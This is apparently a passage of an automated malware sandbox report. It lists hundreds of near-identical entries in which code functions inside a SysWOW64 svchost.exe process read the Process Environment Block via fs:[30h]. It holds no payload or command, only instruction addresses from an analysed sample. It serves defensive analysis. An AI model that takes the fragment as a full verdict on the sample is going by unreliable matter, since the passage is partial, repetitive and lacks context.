          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]1_2_02F4E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]1_2_02F4E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030061E5 mov eax, dword ptr fs:[00000030h]1_2_030061E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB4000 mov ecx, dword ptr fs:[00000030h]1_2_02FB4000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F601F8 mov eax, dword ptr fs:[00000030h]1_2_02F601F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02FAE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02FAE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov ecx, dword ptr fs:[00000030h]1_2_02FAE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02FAE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02FAE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF61C3 mov eax, dword ptr fs:[00000030h]1_2_02FF61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF61C3 mov eax, dword ptr fs:[00000030h]1_2_02FF61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]1_2_02FB019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]1_2_02FB019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]1_2_02FB019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]1_2_02FB019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A197 mov eax, dword ptr fs:[00000030h]1_2_02F2A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A197 mov eax, dword ptr fs:[00000030h]1_2_02F2A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A197 mov eax, dword ptr fs:[00000030h]1_2_02F2A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F70185 mov eax, dword ptr fs:[00000030h]1_2_02F70185
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEC188 mov eax, dword ptr fs:[00000030h]1_2_02FEC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEC188 mov eax, dword ptr fs:[00000030h]1_2_02FEC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4180 mov eax, dword ptr fs:[00000030h]1_2_02FD4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4180 mov eax, dword ptr fs:[00000030h]1_2_02FD4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C156 mov eax, dword ptr fs:[00000030h]1_2_02F2C156
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC8158 mov eax, dword ptr fs:[00000030h]1_2_02FC8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36154 mov eax, dword ptr fs:[00000030h]1_2_02F36154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36154 mov eax, dword ptr fs:[00000030h]1_2_02F36154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]1_2_02FC4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]1_2_02FC4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov ecx, dword ptr fs:[00000030h]1_2_02FC4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]1_2_02FC4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]1_2_02FC4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F60124 mov eax, dword ptr fs:[00000030h]1_2_02F60124
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA118 mov ecx, dword ptr fs:[00000030h]1_2_02FDA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA118 mov eax, dword ptr fs:[00000030h]1_2_02FDA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA118 mov eax, dword ptr fs:[00000030h]1_2_02FDA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA118 mov eax, dword ptr fs:[00000030h]1_2_02FDA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF0115 mov eax, dword ptr fs:[00000030h]1_2_02FF0115
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02FAE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02FAE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02FAE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02FAE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB06F1 mov eax, dword ptr fs:[00000030h]1_2_02FB06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB06F1 mov eax, dword ptr fs:[00000030h]1_2_02FB06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A6C7 mov ebx, dword ptr fs:[00000030h]1_2_02F6A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A6C7 mov eax, dword ptr fs:[00000030h]1_2_02F6A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F666B0 mov eax, dword ptr fs:[00000030h]1_2_02F666B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C6A6 mov eax, dword ptr fs:[00000030h]1_2_02F6C6A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34690 mov eax, dword ptr fs:[00000030h]1_2_02F34690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34690 mov eax, dword ptr fs:[00000030h]1_2_02F34690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F62674 mov eax, dword ptr fs:[00000030h]1_2_02F62674
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF866E mov eax, dword ptr fs:[00000030h]1_2_02FF866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF866E mov eax, dword ptr fs:[00000030h]1_2_02FF866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A660 mov eax, dword ptr fs:[00000030h]1_2_02F6A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A660 mov eax, dword ptr fs:[00000030h]1_2_02F6A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4C640 mov eax, dword ptr fs:[00000030h]1_2_02F4C640
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E627 mov eax, dword ptr fs:[00000030h]1_2_02F4E627
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F66620 mov eax, dword ptr fs:[00000030h]1_2_02F66620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68620 mov eax, dword ptr fs:[00000030h]1_2_02F68620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3262C mov eax, dword ptr fs:[00000030h]1_2_02F3262C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72619 mov eax, dword ptr fs:[00000030h]1_2_02F72619
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE609 mov eax, dword ptr fs:[00000030h]1_2_02FAE609
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F347FB mov eax, dword ptr fs:[00000030h]1_2_02F347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F347FB mov eax, dword ptr fs:[00000030h]1_2_02F347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F527ED mov eax, dword ptr fs:[00000030h]1_2_02F527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F527ED mov eax, dword ptr fs:[00000030h]1_2_02F527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F527ED mov eax, dword ptr fs:[00000030h]1_2_02F527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE7E1 mov eax, dword ptr fs:[00000030h]1_2_02FBE7E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3C7C0 mov eax, dword ptr fs:[00000030h]1_2_02F3C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB07C3 mov eax, dword ptr fs:[00000030h]1_2_02FB07C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F307AF mov eax, dword ptr fs:[00000030h]1_2_02F307AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD678E mov eax, dword ptr fs:[00000030h]1_2_02FD678E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38770 mov eax, dword ptr fs:[00000030h]1_2_02F38770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30750 mov eax, dword ptr fs:[00000030h]1_2_02F30750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE75D mov eax, dword ptr fs:[00000030h]1_2_02FBE75D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72750 mov eax, dword ptr fs:[00000030h]1_2_02F72750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72750 mov eax, dword ptr fs:[00000030h]1_2_02F72750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB4755 mov eax, dword ptr fs:[00000030h]1_2_02FB4755
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6674D mov esi, dword ptr fs:[00000030h]1_2_02F6674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6674D mov eax, dword ptr fs:[00000030h]1_2_02F6674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6674D mov eax, dword ptr fs:[00000030h]1_2_02F6674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6273C mov eax, dword ptr fs:[00000030h]1_2_02F6273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6273C mov ecx, dword ptr fs:[00000030h]1_2_02F6273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6273C mov eax, dword ptr fs:[00000030h]1_2_02F6273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAC730 mov eax, dword ptr fs:[00000030h]1_2_02FAC730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C720 mov eax, dword ptr fs:[00000030h]1_2_02F6C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C720 mov eax, dword ptr fs:[00000030h]1_2_02F6C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30710 mov eax, dword ptr fs:[00000030h]1_2_02F30710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F60710 mov eax, dword ptr fs:[00000030h]1_2_02F60710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C700 mov eax, dword ptr fs:[00000030h]1_2_02F6C700
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F304E5 mov ecx, dword ptr fs:[00000030h]1_2_02F304E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F644B0 mov ecx, dword ptr fs:[00000030h]1_2_02F644B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBA4B0 mov eax, dword ptr fs:[00000030h]1_2_02FBA4B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F364AB mov eax, dword ptr fs:[00000030h]1_2_02F364AB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5A470 mov eax, dword ptr fs:[00000030h]1_2_02F5A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5A470 mov eax, dword ptr fs:[00000030h]1_2_02F5A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5A470 mov eax, dword ptr fs:[00000030h]1_2_02F5A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBC460 mov ecx, dword ptr fs:[00000030h]1_2_02FBC460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2645D mov eax, dword ptr fs:[00000030h]1_2_02F2645D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5245A mov eax, dword ptr fs:[00000030h]1_2_02F5245A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E420 mov eax, dword ptr fs:[00000030h]1_2_02F2E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E420 mov eax, dword ptr fs:[00000030h]1_2_02F2E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E420 mov eax, dword ptr fs:[00000030h]1_2_02F2E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C427 mov eax, dword ptr fs:[00000030h]1_2_02F2C427
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68402 mov eax, dword ptr fs:[00000030h]1_2_02F68402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68402 mov eax, dword ptr fs:[00000030h]1_2_02F68402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68402 mov eax, dword ptr fs:[00000030h]1_2_02F68402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F325E0 mov eax, dword ptr fs:[00000030h]1_2_02F325E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C5ED mov eax, dword ptr fs:[00000030h]1_2_02F6C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C5ED mov eax, dword ptr fs:[00000030h]1_2_02F6C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F365D0 mov eax, dword ptr fs:[00000030h]1_2_02F365D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]1_2_02F6A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]1_2_02F6A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E5CF mov eax, dword ptr fs:[00000030h]1_2_02F6E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E5CF mov eax, dword ptr fs:[00000030h]1_2_02F6E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F545B1 mov eax, dword ptr fs:[00000030h]1_2_02F545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F545B1 mov eax, dword ptr fs:[00000030h]1_2_02F545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB05A7 mov eax, dword ptr fs:[00000030h]1_2_02FB05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB05A7 mov eax, dword ptr fs:[00000030h]1_2_02FB05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB05A7 mov eax, dword ptr fs:[00000030h]1_2_02FB05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E59C mov eax, dword ptr fs:[00000030h]1_2_02F6E59C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F32582 mov eax, dword ptr fs:[00000030h]1_2_02F32582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F32582 mov ecx, dword ptr fs:[00000030h]1_2_02F32582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F64588 mov eax, dword ptr fs:[00000030h]1_2_02F64588
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6656A mov eax, dword ptr fs:[00000030h]1_2_02F6656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6656A mov eax, dword ptr fs:[00000030h]1_2_02F6656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6656A mov eax, dword ptr fs:[00000030h]1_2_02F6656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38550 mov eax, dword ptr fs:[00000030h]1_2_02F38550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38550 mov eax, dword ptr fs:[00000030h]1_2_02F38550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6500 mov eax, dword ptr fs:[00000030h]1_2_02FC6500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6AAEE mov eax, dword ptr fs:[00000030h]1_2_02F6AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6AAEE mov eax, dword ptr fs:[00000030h]1_2_02F6AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30AD0 mov eax, dword ptr fs:[00000030h]1_2_02F30AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F64AD0 mov eax, dword ptr fs:[00000030h]1_2_02F64AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F64AD0 mov eax, dword ptr fs:[00000030h]1_2_02F64AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86ACC mov eax, dword ptr fs:[00000030h]1_2_02F86ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86ACC mov eax, dword ptr fs:[00000030h]1_2_02F86ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86ACC mov eax, dword ptr fs:[00000030h]1_2_02F86ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38AA0 mov eax, dword ptr fs:[00000030h]1_2_02F38AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38AA0 mov eax, dword ptr fs:[00000030h]1_2_02F38AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86AA4 mov eax, dword ptr fs:[00000030h]1_2_02F86AA4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68A90 mov edx, dword ptr fs:[00000030h]1_2_02F68A90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
